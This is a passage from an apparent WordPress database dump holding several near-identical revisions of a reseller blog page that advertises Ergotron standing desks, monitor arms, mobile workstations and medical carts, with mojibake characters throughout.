src=\"https://www.ergotron.com/Portals/0/Images/Icons/icon-quality.png\" />\r\n\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n\r\n5. <strong>Patents</strong>Â  Â  Â  Â <img src=\"https://www.ergotron.com/portals/0/images/icons/icon-cf.png\" />\r\n<div class=\"DnnModule DnnModule-2sxc DnnModule-2294\">\r\n<div class=\"container-top-margin\">\r\n<div id=\"dnn_ctr2294_ContentPane\">\r\n<div id=\"dnn_ctr2294_ModuleContent\" class=\"DNNModuleContent Mod2sxcC\">\r\n<div class=\"sc-viewport sc-content-block\" data-cb-instance=\"2294\" data-cb-id=\"2294\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-xs-12\">\r\n<p class=\"intro\">Ergotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.</p>\r\n\r\n<h1>Standing Desks</h1>\r\nSit less. Stand more. Feel the difference.\r\n<p class=\"h3 ng-binding ng-scope\">1. WorkFit-Z MiniÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/33-458-917-a-560x500.jpg\" width=\"279\" height=\"279\" /></p>\r\n\r\n<div class=\"main\">\r\n<div class=\"ng-binding\">\r\n\r\nMake your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n\r\n2.Â WorkFit-TL, Standing Desk WorkstationÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/33-406-085-wftl-lxarm-single-greyscrn-560x500.jpg\" width=\"277\" height=\"277\" />\r\n\r\nPresenting an ultra easy standing desk solution, which quickly converts a tabletop into a healthy sit-stand workstation.Â WorkFit-TL features a larger keyboard tray and wider worksurface. Like the smaller WorkFit-T, it saves space because it moves straight up and down, always staying within the footprint of your desktop. Extremely stable throughout its range of motion, one can freely lean on it without worry of tip or height-drop.\r\n\r\n3.Â WorkFit-S,Â Dual Workstation with WorksurfaceÂ Â <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/33-349-200-wfs-dualworksurface_greyscrn-560x500.jpg\" width=\"277\" height=\"277\" />\r\n\r\nThis easy-to-use sit-stand desk converter allows you to instantly raise or lower your keyboard and two displays in one simple motion, keeping your system stable as you work. Includes a complementary worksurface and larger keyboard tray.\r\n<h1>Mounts</h1>\r\nImprove your workflow: Mount a monitor, multiple displays, laptop or keyboard.\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">LX Desk Monitor ArmÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/45-241-026_a-560x500.jpg\" width=\"196\" height=\"196\" /></li>\r\n</ol>\r\nSleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n\r\n2.Â LX Dual Stacking ArmÂ  Â <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/45-248-026%20lx%20dual%20stacking%20front%20trans%20web-hr-560x500.jpg\" width=\"194\" height=\"194\" />\r\n\r\nCreate a productive multi-display configuration that lifts screens up to where theyâ€™re easier to see while reclaiming valuable worksurface.\r\n\r\n3.Â LX Wall Monitor ArmÂ  Â <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/45-243-026_3-560x500.jpg\" width=\"208\" height=\"208\" />\r\n\r\nSleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n<h3 class=\"tab accordian ng-binding active\" style=\"text-align: left;\" tabindex=\"0\" role=\"tab\" aria-controls=\"panel1\">Product Benefits</h3>\r\n<ul>\r\n 	<li>Increase viewing comfortâ€”help reduce eye, back and neck strain</li>\r\n 	<li>Upgrade LCD monitors and TVs with improved ergonomic adjustment</li>\r\n 	<li>Patented CFâ„¢ motion technology provides premium ease-of-use display adjustment</li>\r\n 	<li>Cable management feature routes cables under the arm, out of the way</li>\r\n 	<li>Extends LCD up to 25\" (64 cm); push your display out of the way when not in use</li>\r\n</ul>\r\n<h1>Mobile Carts</h1>\r\nPersonalize an AV, computer or laptop cart to suit your workflow requirements\r\n<h4>Mobile Workstations</h4>\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">WorkFit-C, Single LD Sit-Stand WorkstationÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/24-198-055_av2-560x500.jpg\" width=\"185\" height=\"185\" /></li>\r\n</ol>\r\nThis computer cartâ€™s large worksurface and height-adjustable keyboard tray and display make it a full-featured mobile desk, enabling computing comfort while you work. Stay energized and productive while you workâ€”move from a sitting to a standing position whenever you want.\r\n\r\n2.Â WorkFit-C, Dual Sit-Stand WorkstationÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/24-214-085_c-560x500.jpg\" width=\"174\" height=\"174\" />\r\n\r\nThis innovative computer cart doubles as an adjustable sit-stand mobile desk. Stay energized and productive while you computeâ€”move from a sitting to a standing position whenever you want. The large worksurface, back-tilt keyboard tray and independently adjustable dual-monitor riser make computing comfortable.\r\n\r\n3.Â Neo-FlexÂ® Laptop CartÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/24-205-214_b-560x500.jpg\" width=\"187\" height=\"187\" />\r\n\r\nThis secure, low-cost, height-adjustable computer cart supports your mobile computing needs today and tomorrow. It features a laptop security system, 20 inches (51 cm) of height adjustment (work sitting or standing), large worksurface, small footprint and a rugged, open-architecture design.\r\n<h4>Medical Carts</h4>\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">StyleViewÂ® Laptop Cart, SV40Â <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/sv40-6100_b1-560x500.jpg\" width=\"205\" height=\"205\" /></li>\r\n</ol>\r\nIncredibly lightweight. This innovative, truly ergonomic and easy-to-maneuver healthcare cart features sit-to-stand height adjustment and an adjustable back-tilt keyboard tray.\r\n\r\n2.Â StyleViewÂ® Telemedicine Cart, Single Monitor, PoweredÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Products/sv44-53t1_a1-560x500.jpg\" width=\"200\" height=\"200\" />\r\n\r\nExpand healthcare access through telehealth with this easy and affordable mobile solution, which combines the power to support onboard diagnostics and videoconferencing with the benefits of a StyleView medical cart. Backed by our years of expertise and service, you can confidently build a telemedicine platform that matches your needs and budget.\r\n\r\n3.Â StyleViewÂ® Telemedicine Cart, PoweredÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/sv44-dual-telemed-b-560x500.jpg\" width=\"203\" height=\"203\" />\r\n\r\nThe modular design of StyleView carts allows you to build a telehealth solution that matches your requirements. Combine support for onboard diagnostics and videoconferencing with the benefits of a fully mobile workstation on wheels. The addition of the SV Dual Monitor Kit provides convenient side-to-side pivoting of either display, helping compartmentalize screen viewing for caregiver and patient.\r\n\r\n4.Â CareFitâ„¢ Slim LCD Cart, 1 Drawer (1x1)Â <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Products/c50-2510-a1_update-560x500.jpg\" width=\"189\" height=\"189\" />\r\n\r\nThe ultra-lean CareFit computer cart works to remove barriers to the best patient care with a lightweight design that fits your people, workflows and environments. The broadest range of caregivers can work comfortably with the expansive height range that adjusts to the ergonomic needs of each user. The compact frame makes it easy to move all-in-one computers and monitors wherever work takes caregivers around the healthcare facility.\r\n\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"DnnModule DnnModule-2sxc DnnModule-2112\">\r\n<div id=\"dnn_ctr2112_ContentPane\">\r\n<div id=\"dnn_ctr2112_ModuleContent\" class=\"DNNModuleContent Mod2sxcC\">\r\n<div class=\"sc-viewport sc-content-block\" data-cb-instance=\"2112\" data-cb-id=\"2112\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-xs-12\">\r\n<div class=\"row info-strip mgnbtm15\">\r\n<div class=\"item col-md-4 mgnbtm0-xs\">\r\n<div class=\"text-center mgnbtm10 mgntop10\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2018-12-15 20:25:00','2018-12-15 12:25:00','',1483,'https://bintara.com.my/blog/2018/12/15/1483-revision-v1/',0,'revision','',0),(2214,1,'2018-12-15 20:24:00','2018-12-15 12:24:00','<h2 class=\"h4\"><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n\r\n<h3 class=\"text-center mgnbtm2\">Why Choose Ergotron?</h3>\r\n<ol>\r\n 	<li><strong>Ergonomics</strong><img src=\"https://www.ergotron.com/Portals/0/Images/Icons/icon-ergonomics.png\" /></li>\r\n</ol>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n\r\n2. <strong>Environment</strong><img src=\"https://www.ergotron.com/Portals/0/Images/Icons/icon-environment.png\" />\r\n\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n\r\n3. <strong>Research</strong>Â  Â  Â <img src=\"https://www.ergotron.com/Portals/0/Images/Icons/icon-research2.png\" />\r\n\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n\r\n4. <strong>Quality Tested</strong>Â Â <img src=\"https://www.ergotron.com/Portals/0/Images/Icons/icon-quality.png\" />\r\n\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n\r\n5. <strong>Patents</strong>Â  Â  Â  Â <img src=\"https://www.ergotron.com/portals/0/images/icons/icon-cf.png\" />\r\n<div class=\"DnnModule DnnModule-2sxc DnnModule-2294\">\r\n<div class=\"container-top-margin\">\r\n<div id=\"dnn_ctr2294_ContentPane\">\r\n<div id=\"dnn_ctr2294_ModuleContent\" class=\"DNNModuleContent Mod2sxcC\">\r\n<div class=\"sc-viewport sc-content-block\" data-cb-instance=\"2294\" data-cb-id=\"2294\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-xs-12\">\r\n<p class=\"intro\">Ergotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies. Ergotronâ€™s patented PowerShuttle control system charges up to 40% faster than competing round-robin charging systems, while our counterbalancing mechanism uses Constant Force Technology to facilitate quick height adjustment.</p>\r\n\r\n<h1>Standing Desks</h1>\r\nSit less. Stand more. Feel the difference.\r\n<p class=\"h3 ng-binding ng-scope\">1. WorkFit-Z MiniÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/33-458-917-a-560x500.jpg\" width=\"279\" height=\"279\" /></p>\r\n\r\n<div class=\"main\">\r\n<div class=\"ng-binding\">\r\n\r\nMake your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n\r\n2.Â WorkFit-TL, Standing Desk WorkstationÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/33-406-085-wftl-lxarm-single-greyscrn-560x500.jpg\" width=\"277\" height=\"277\" />\r\n\r\nPresenting an ultra easy standing desk solution, which quickly converts a tabletop into a healthy sit-stand workstation.Â WorkFit-TL features a larger keyboard tray and wider worksurface. Like the smaller WorkFit-T, it saves space because it moves straight up and down, always staying within the footprint of your desktop. Extremely stable throughout its range of motion, one can freely lean on it without worry of tip or height-drop.\r\n\r\n3.Â WorkFit-S,Â Dual Workstation with WorksurfaceÂ Â <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/33-349-200-wfs-dualworksurface_greyscrn-560x500.jpg\" width=\"277\" height=\"277\" />\r\n\r\nThis easy-to-use sit-stand desk converter allows you to instantly raise or lower your keyboard and two displays in one simple motion, keeping your system stable as you work. Includes a complementary worksurface and larger keyboard tray.\r\n<h1>Mounts</h1>\r\nImprove your workflow: Mount a monitor, multiple displays, laptop or keyboard.\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">LX Desk Monitor ArmÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/45-241-026_a-560x500.jpg\" width=\"196\" height=\"196\" /></li>\r\n</ol>\r\nSleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n\r\n2.Â LX Dual Stacking ArmÂ  Â <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/45-248-026%20lx%20dual%20stacking%20front%20trans%20web-hr-560x500.jpg\" width=\"194\" height=\"194\" />\r\n\r\nCreate a productive multi-display configuration that lifts screens up to where theyâ€™re easier to see while reclaiming valuable worksurface.\r\n\r\n3.Â LX Wall Monitor ArmÂ  Â <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/45-243-026_3-560x500.jpg\" width=\"208\" height=\"208\" />\r\n\r\nSleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n<h3 class=\"tab accordian ng-binding active\" style=\"text-align: left;\" tabindex=\"0\" role=\"tab\" aria-controls=\"panel1\">Product Benefits</h3>\r\n<ul>\r\n 	<li>Increase viewing comfortâ€”help reduce eye, back and neck strain</li>\r\n 	<li>Upgrade LCD monitors and TVs with improved ergonomic adjustment</li>\r\n 	<li>Patented CFâ„¢ motion technology provides premium ease-of-use display adjustment</li>\r\n 	<li>Cable management feature routes cables under the arm, out of the way</li>\r\n 	<li>Extends LCD up to 25\" (64 cm); push your display out of the way when not in use</li>\r\n</ul>\r\n<h1>Mobile Carts</h1>\r\nPersonalize an AV, computer or laptop cart to suit your workflow requirements\r\n<h4>Mobile Workstations</h4>\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">WorkFit-C, Single LD Sit-Stand WorkstationÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/24-198-055_av2-560x500.jpg\" width=\"185\" height=\"185\" /></li>\r\n</ol>\r\nThis computer cartâ€™s large worksurface and height-adjustable keyboard tray and display make it a full-featured mobile desk, enabling computing comfort while you work. Stay energized and productive while you workâ€”move from a sitting to a standing position whenever you want.\r\n\r\n2.Â WorkFit-C, Dual Sit-Stand WorkstationÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/24-214-085_c-560x500.jpg\" width=\"174\" height=\"174\" />\r\n\r\nThis innovative computer cart doubles as an adjustable sit-stand mobile desk. Stay energized and productive while you computeâ€”move from a sitting to a standing position whenever you want. The large worksurface, back-tilt keyboard tray and independently adjustable dual-monitor riser make computing comfortable.\r\n\r\n3.Â Neo-FlexÂ® Laptop CartÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/24-205-214_b-560x500.jpg\" width=\"187\" height=\"187\" />\r\n\r\nThis secure, low-cost, height-adjustable computer cart supports your mobile computing needs today and tomorrow. It features a laptop security system, 20 inches (51 cm) of height adjustment (work sitting or standing), large worksurface, small footprint and a rugged, open-architecture design.\r\n<h4>Medical Carts</h4>\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">StyleViewÂ® Laptop Cart, SV40Â <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/sv40-6100_b1-560x500.jpg\" width=\"205\" height=\"205\" /></li>\r\n</ol>\r\nIncredibly lightweight. This innovative, truly ergonomic and easy-to-maneuver healthcare cart features sit-to-stand height adjustment and an adjustable back-tilt keyboard tray.\r\n\r\n2.Â StyleViewÂ® Telemedicine Cart, Single Monitor, PoweredÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Products/sv44-53t1_a1-560x500.jpg\" width=\"200\" height=\"200\" />\r\n\r\nExpand healthcare access through telehealth with this easy and affordable mobile solution, which combines the power to support onboard diagnostics and videoconferencing with the benefits of a StyleView medical cart. Backed by our years of expertise and service, you can confidently build a telemedicine platform that matches your needs and budget.\r\n\r\n3.Â StyleViewÂ® Telemedicine Cart, PoweredÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/sv44-dual-telemed-b-560x500.jpg\" width=\"203\" height=\"203\" />\r\n\r\nThe modular design of StyleView carts allows you to build a telehealth solution that matches your requirements. Combine support for onboard diagnostics and videoconferencing with the benefits of a fully mobile workstation on wheels. The addition of the SV Dual Monitor Kit provides convenient side-to-side pivoting of either display, helping compartmentalize screen viewing for caregiver and patient.\r\n\r\n4.Â CareFitâ„¢ Slim LCD Cart, 1 Drawer (1x1)Â <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Products/c50-2510-a1_update-560x500.jpg\" width=\"189\" height=\"189\" />\r\n\r\nThe ultra-lean CareFit computer cart works to remove barriers to the best patient care with a lightweight design that fits your people, workflows and environments. The broadest range of caregivers can work comfortably with the expansive height range that adjusts to the ergonomic needs of each user. The compact frame makes it easy to move all-in-one computers and monitors wherever work takes caregivers around the healthcare facility.\r\n\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"DnnModule DnnModule-2sxc DnnModule-2112\">\r\n<div id=\"dnn_ctr2112_ContentPane\">\r\n<div id=\"dnn_ctr2112_ModuleContent\" class=\"DNNModuleContent Mod2sxcC\">\r\n<div class=\"sc-viewport sc-content-block\" data-cb-instance=\"2112\" data-cb-id=\"2112\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-xs-12\">\r\n<div class=\"row info-strip mgnbtm15\">\r\n<div class=\"item col-md-4 mgnbtm0-xs\">\r\n<div class=\"text-center mgnbtm10 mgntop10\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2018-12-15 20:24:00','2018-12-15 12:24:00','',1483,'https://bintara.com.my/blog/2018/12/15/1483-revision-v1/',0,'revision','',0),(2216,1,'2018-12-15 20:25:37','2018-12-15 12:25:37','<h2 class=\"h4\"><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n\r\n<h3 class=\"text-center mgnbtm2\">Why Choose Ergotron?</h3>\r\n<ol>\r\n 	<li><strong>Ergonomics</strong><img src=\"https://www.ergotron.com/Portals/0/Images/Icons/icon-ergonomics.png\" /></li>\r\n</ol>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n\r\n2. <strong>Environment</strong><img src=\"https://www.ergotron.com/Portals/0/Images/Icons/icon-environment.png\" />\r\n\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n\r\n3. <strong>Research</strong>Â  Â  Â <img src=\"https://www.ergotron.com/Portals/0/Images/Icons/icon-research2.png\" />\r\n\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n\r\n4. <strong>Quality Tested</strong>Â Â <img src=\"https://www.ergotron.com/Portals/0/Images/Icons/icon-quality.png\" />\r\n\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n\r\n5. <strong>Patents</strong>Â  Â  Â  Â <img src=\"https://www.ergotron.com/portals/0/images/icons/icon-cf.png\" />\r\n<div class=\"DnnModule DnnModule-2sxc DnnModule-2294\">\r\n<div class=\"container-top-margin\">\r\n<div id=\"dnn_ctr2294_ContentPane\">\r\n<div id=\"dnn_ctr2294_ModuleContent\" class=\"DNNModuleContent Mod2sxcC\">\r\n<div class=\"sc-viewport sc-content-block\" data-cb-instance=\"2294\" data-cb-id=\"2294\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-xs-12\">\r\n<p class=\"intro\">Ergotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.</p>\r\n\r\n<h1>Standing Desks</h1>\r\nSit less. Stand more. Feel the difference.\r\n<p class=\"h3 ng-binding ng-scope\">1. WorkFit-Z MiniÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/33-458-917-a-560x500.jpg\" width=\"279\" height=\"279\" /></p>\r\n\r\n<div class=\"main\">\r\n<div class=\"ng-binding\">\r\n\r\nMake your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n\r\n2.Â WorkFit-TL, Standing Desk WorkstationÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/33-406-085-wftl-lxarm-single-greyscrn-560x500.jpg\" width=\"277\" height=\"277\" />\r\n\r\nPresenting an ultra easy standing desk solution, which quickly converts a tabletop into a healthy sit-stand workstation.Â WorkFit-TL features a larger keyboard tray and wider worksurface. Like the smaller WorkFit-T, it saves space because it moves straight up and down, always staying within the footprint of your desktop. Extremely stable throughout its range of motion, one can freely lean on it without worry of tip or height-drop.\r\n\r\n3.Â WorkFit-S,Â Dual Workstation with WorksurfaceÂ Â <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/33-349-200-wfs-dualworksurface_greyscrn-560x500.jpg\" width=\"277\" height=\"277\" />\r\n\r\nThis easy-to-use sit-stand desk converter allows you to instantly raise or lower your keyboard and two displays in one simple motion, keeping your system stable as you work. Includes a complementary worksurface and larger keyboard tray.\r\n<h1>Mounts</h1>\r\nImprove your workflow: Mount a monitor, multiple displays, laptop or keyboard.\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">LX Desk Monitor ArmÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/45-241-026_a-560x500.jpg\" width=\"183\" height=\"183\" /></li>\r\n</ol>\r\nSleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n\r\n2.Â LX Dual Stacking ArmÂ  Â <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/45-248-026%20lx%20dual%20stacking%20front%20trans%20web-hr-560x500.jpg\" width=\"194\" height=\"194\" />\r\n\r\nCreate a productive multi-display configuration that lifts screens up to where theyâ€™re easier to see while reclaiming valuable worksurface.\r\n\r\n3.Â LX Wall Monitor ArmÂ  Â <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/45-243-026_3-560x500.jpg\" width=\"208\" height=\"208\" />\r\n\r\nSleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n<h3 class=\"tab accordian ng-binding active\" style=\"text-align: left;\" tabindex=\"0\" role=\"tab\" aria-controls=\"panel1\">Product Benefits</h3>\r\n<ul>\r\n 	<li>Increase viewing comfortâ€”help reduce eye, back and neck strain</li>\r\n 	<li>Upgrade LCD monitors and TVs with improved ergonomic adjustment</li>\r\n 	<li>Patented CFâ„¢ motion technology provides premium ease-of-use display adjustment</li>\r\n 	<li>Cable management feature routes cables under the arm, out of the way</li>\r\n 	<li>Extends LCD up to 25\" (64 cm); push your display out of the way when not in use</li>\r\n</ul>\r\n<h1>Mobile Carts</h1>\r\nPersonalize an AV, computer or laptop cart to suit your workflow requirements\r\n<h4>Mobile Workstations</h4>\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">WorkFit-C, Single LD Sit-Stand WorkstationÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/24-198-055_av2-560x500.jpg\" width=\"185\" height=\"185\" /></li>\r\n</ol>\r\nThis computer cartâ€™s large worksurface and height-adjustable keyboard tray and display make it a full-featured mobile desk, enabling computing comfort while you work. Stay energized and productive while you workâ€”move from a sitting to a standing position whenever you want.\r\n\r\n2.Â WorkFit-C, Dual Sit-Stand WorkstationÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/24-214-085_c-560x500.jpg\" width=\"174\" height=\"174\" />\r\n\r\nThis innovative computer cart doubles as an adjustable sit-stand mobile desk. Stay energized and productive while you computeâ€”move from a sitting to a standing position whenever you want. The large worksurface, back-tilt keyboard tray and independently adjustable dual-monitor riser make computing comfortable.\r\n\r\n3.Â Neo-FlexÂ® Laptop CartÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/24-205-214_b-560x500.jpg\" width=\"187\" height=\"187\" />\r\n\r\nThis secure, low-cost, height-adjustable computer cart supports your mobile computing needs today and tomorrow. It features a laptop security system, 20 inches (51 cm) of height adjustment (work sitting or standing), large worksurface, small footprint and a rugged, open-architecture design.\r\n<h4>Medical Carts</h4>\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">StyleViewÂ® Laptop Cart, SV40Â <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/sv40-6100_b1-560x500.jpg\" width=\"205\" height=\"205\" /></li>\r\n</ol>\r\nIncredibly lightweight. This innovative, truly ergonomic and easy-to-maneuver healthcare cart features sit-to-stand height adjustment and an adjustable back-tilt keyboard tray.\r\n\r\n2.Â StyleViewÂ® Telemedicine Cart, Single Monitor, PoweredÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Products/sv44-53t1_a1-560x500.jpg\" width=\"200\" height=\"200\" />\r\n\r\nExpand healthcare access through telehealth with this easy and affordable mobile solution, which combines the power to support onboard diagnostics and videoconferencing with the benefits of a StyleView medical cart. Backed by our years of expertise and service, you can confidently build a telemedicine platform that matches your needs and budget.\r\n\r\n3.Â StyleViewÂ® Telemedicine Cart, PoweredÂ <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Parts/sv44-dual-telemed-b-560x500.jpg\" width=\"203\" height=\"203\" />\r\n\r\nThe modular design of StyleView carts allows you to build a telehealth solution that matches your requirements. Combine support for onboard diagnostics and videoconferencing with the benefits of a fully mobile workstation on wheels. The addition of the SV Dual Monitor Kit provides convenient side-to-side pivoting of either display, helping compartmentalize screen viewing for caregiver and patient.\r\n\r\n4.Â CareFitâ„¢ Slim LCD Cart, 1 Drawer (1x1)Â <img class=\"\" src=\"https://www.ergotron.com/Portals/0/Reserved/Products/c50-2510-a1_update-560x500.jpg\" width=\"189\" height=\"189\" />\r\n\r\nThe ultra-lean CareFit computer cart works to remove barriers to the best patient care with a lightweight design that fits your people, workflows and environments. The broadest range of caregivers can work comfortably with the expansive height range that adjusts to the ergonomic needs of each user. The compact frame makes it easy to move all-in-one computers and monitors wherever work takes caregivers around the healthcare facility.\r\n\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"DnnModule DnnModule-2sxc DnnModule-2112\">\r\n<div id=\"dnn_ctr2112_ContentPane\">\r\n<div 